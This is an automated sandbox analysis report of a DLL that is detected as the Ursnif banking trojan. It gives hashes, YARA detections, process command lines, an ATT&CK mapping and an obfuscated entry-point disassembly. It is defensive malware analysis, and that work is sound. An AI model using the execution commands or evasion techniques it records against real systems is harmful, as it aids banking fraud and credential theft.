Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Mal.EncPk-APW.3323.dll
Analysis ID:	382278
MD5:	937e2c551368757c5e3c3598c41ea7d9
SHA1:	599b5bc9138bec69ac61a82858d2a2115eeab943
SHA256:	cb73a2cf01aa499376231e1c5c14dbf0abfae7a2f2036c78bcfbc35b2284a5d5
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5584 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 1936 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 660 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4992 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll,DllServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.loaddll32.exe.10000000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.2600000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.4990000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.d90000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Virustotal: Detection: 28%

Perma Link

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Joe Sandbox ML: detected

Source: 1.2.loaddll32.exe.10000000.3.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.d90000.2.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.d90000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10002375 NtQueryVirtualMemory,

1_2_10002375

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002154	1_2_10002154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16	3_2_023D5F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5A25	3_2_023D5A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D1B1E	3_2_023D1B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D3A14	3_2_023D3A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D150C	3_2_023D150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5378	3_2_023D5378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D2A69	3_2_023D2A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D1967	3_2_023D1967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D2566	3_2_023D2566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5262	3_2_023D5262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D88BA	3_2_023D88BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D31B3	3_2_023D31B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D92B2	3_2_023D92B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D2FAF	3_2_023D2FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D3FAB	3_2_023D3FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D43D8	3_2_023D43D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D27D4	3_2_023D27D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D1CD0	3_2_023D1CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D13C5	3_2_023D13C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03045F16	4_2_03045F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0304150C	4_2_0304150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03043A14	4_2_03043A14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03041B1E	4_2_03041B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03045A25	4_2_03045A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03042566	4_2_03042566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03041967	4_2_03041967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03045262	4_2_03045262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03042A69	4_2_03042A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03045378	4_2_03045378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03042FAF	4_2_03042FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03043FAB	4_2_03043FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030492B2	4_2_030492B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030431B3	4_2_030431B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030488BA	4_2_030488BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030413C5	4_2_030413C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030427D4	4_2_030427D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03041CD0	4_2_03041CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_030443D8	4_2_030443D8

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal60.troj.winDLL@7/0@0/0

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll,DllServer

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Virustotal: Detection: 28%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll,DllServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll,DllServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001745 LoadLibraryA,GetProcAddress,

1_2_10001745

Source: SecuriteInfo.com.Mal.EncPk-APW.3323.dll

Static PE information: section name: .code

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002143 push ecx; ret	1_2_10002153
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100020F0 push ecx; ret	1_2_100020F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	3_2_023D5F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D5F94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D5FDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_023D604B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D6124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edi	3_2_023D614F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edx	3_2_023D625E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_023D62B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_023D6343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_023D635D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], ebp	3_2_023D6368
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D6385
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edx	3_2_023D63B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D6483
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D64F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	3_2_023D64FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D650A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edi	3_2_023D6567
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edi	3_2_023D65A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], eax	3_2_023D6610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D6685
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	3_2_023D66C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D66E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edi	3_2_023D6781
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push 00000000h; mov dword ptr [esp], edx	3_2_023D67B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D684C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	3_2_023D6858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-10h]; mov dword ptr [esp], edx	3_2_023D6926
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D5F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	3_2_023D6945

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.d90000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001745 LoadLibraryA,GetProcAddress,

1_2_10001745

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_023D2A69 xor edi, dword ptr fs:[00000030h]		3_2_023D2A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03042A69 xor edi, dword ptr fs:[00000030h]		4_2_03042A69

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Mal.EncPk-APW.3323.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.625565568.0000000001450000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.625565568.0000000001450000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.625565568.0000000001450000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.625565568.0000000001450000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_1000163F SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_1000163F

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_10001850

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.d90000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.274936732.0000000002600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.254342538.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.625111885.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4990000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.d90000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	System Information Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Mal.EncPk-APW.3323.dll	28%	Virustotal		Browse
SecuriteInfo.com.Mal.EncPk-APW.3323.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.loaddll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382278
Start date:	06.04.2021
Start time:	00:57:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Mal.EncPk-APW.3323.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.winDLL@7/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 98% (good quality ratio 86.6%) Quality average: 66.5% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 52% Number of executed functions: 12 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.062199163268322
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Mal.EncPk-APW.3323.dll
File size:	120083
MD5:	937e2c551368757c5e3c3598c41ea7d9
SHA1:	599b5bc9138bec69ac61a82858d2a2115eeab943
SHA256:	cb73a2cf01aa499376231e1c5c14dbf0abfae7a2f2036c78bcfbc35b2284a5d5
SHA512:	1147923ea3e1b93d9fff6a9a9a97742517a8e64fdf6b2658efc35654284902c6fee00976c3f6d17d3761426e680dc29d40b58f8036fcf1c2776deda083b669b4
SSDEEP:	1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e..)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko.............................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10006f6b
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x6066E9D0 [Fri Apr 2 09:54:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3f728412058b62c418b1091768b74d7b

Entrypoint Preview

Instruction
push ebx
push esi
and dword ptr [esp], 00000000h
or dword ptr [esp], ebp
mov ebp, esp
add esp, FFFFFFF8h
push esp
mov dword ptr [esp], FFFF0000h
call 00007FF284E352B1h
push eax
add dword ptr [esp], 00000247h
sub dword ptr [esp], eax
push esi
mov dword ptr [esp], 00001567h
call 00007FF284E34227h
push eax
or dword ptr [esp], eax
pop eax
jne 00007FF284E3952Bh
pushad
push 00000000h
mov dword ptr [esp], esi
xor esi, esi
xor esi, dword ptr [ebx+0041C627h]
mov eax, esi
pop esi
push ebx
add dword ptr [esp], 40h
sub dword ptr [esp], ebx
push ebp
add dword ptr [esp], 00001000h
sub dword ptr [esp], ebp
mov dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
xor dword ptr [esp], eax
push 00000000h
call dword ptr [ebx+0041F05Ch]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
or ecx, eax
and edi, 00000000h
xor edi, ecx
mov ecx, dword ptr [ebp-04h]
push edi
pop dword ptr [ebp-04h]
push dword ptr [ebp-04h]
pop dword ptr [ebx+0041CAEDh]
cmp ebx, 00000000h
jbe 00007FF284E3951Ch
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041C166h]
pop edx
add edx, ebx
mov dword ptr [ebx+0041C166h], edx
pop edx
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041CECAh]
pop edx
add edx, ebx
mov dword ptr [ebx+0041CECAh], edx
pop edx
push ebp
and ebp, 00000000h
or ebp, dword ptr [ebx+0041C166h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1a000	0x64	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f0fc	0x118	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0xfc	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
